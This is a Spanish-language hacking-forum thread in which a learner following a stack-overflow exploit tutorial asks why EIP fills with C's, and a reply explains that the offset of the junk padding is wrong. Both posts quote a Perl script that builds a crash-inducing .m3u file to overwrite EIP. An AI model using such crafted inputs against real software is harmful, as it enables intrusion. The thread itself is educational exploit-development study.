elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Concurso de desarrollo de aplicaciones EHN-DEV 2014


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  confusion!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: confusion!  (Leído 1,035 veces)
0x3c

Desconectado Desconectado

Mensajes: 108


learning, making mistakes, having fun


Ver Perfil
confusion!
« en: 11 Enero 2013, 09:49 »

saludos estoy siguiendo estos tutoriales....

corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

el problema es que cuando llego a la parte que se debe llenar EIP con B's en vez de llenarse con B's se llena con C's...??? estare haciendo algo mal?


por cierto para llenar el EIP con B's en el tutorial aparece este codigo:

Código:
my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";

por cierto en el codigo que use cambie las letras por sus equivalentes en 'hexadecimal'..


saludos
En línea

Si Vis Pacem, Para Bellum.

Another Legend Has Fallen
ThePinkPanther

Desconectado Desconectado

Mensajes: 82



Ver Perfil
Re: confusion!
« Respuesta #1 en: 26 Enero 2013, 23:54 »

saludos estoy siguiendo estos tutoriales....

corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

el problema es que cuando llego a la parte que se debe llenar EIP con B's en vez de llenarse con B's se llena con C's...??? estare haciendo algo mal?


por cierto para llenar el EIP con B's en el tutorial aparece este codigo:

Código:
my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";

por cierto en el codigo que use cambie las letras por sus equivalentes en 'hexadecimal'..


saludos
Eip se llena con c , porque esta mal la parte del codigo
print $FILE $junk.$eip.$espdata; , en sintaxis esto esta bien , porque llenar llena pero con C , porque no llega $junk al punto justo donde se sobreeescribe eip , fijate el punto justo donde EIP es sobreescrito , y modifica esto :

my $junk= "A" x 26094;

por :  "A" x "EL numero entero justo -1 donde se escribe EIP."

Saludos.


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Confusion
Seguridad
coyituu 1 603 Último mensaje 11 Marzo 2006, 00:22
por Robokop
Confusion con no-ip
Dudas Generales
SalvadorDali 1 437 Último mensaje 7 Diciembre 2006, 05:30
por дٳŦ٭
confusion
Desarrollo Web
cker 5 927 Último mensaje 14 Noviembre 2011, 21:21
por cker
confusion y duda en placabase-RAM (SOLUCIONADO)
Hardware
noker613 5 2,459 Último mensaje 5 Enero 2012, 23:03
por Aprendiz-Oscuro
Una confusion con Twitter dispara el precio de Tweeter
Noticias
wolfbcn 0 653 Último mensaje 5 Octubre 2013, 02:50
por wolfbcn
Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines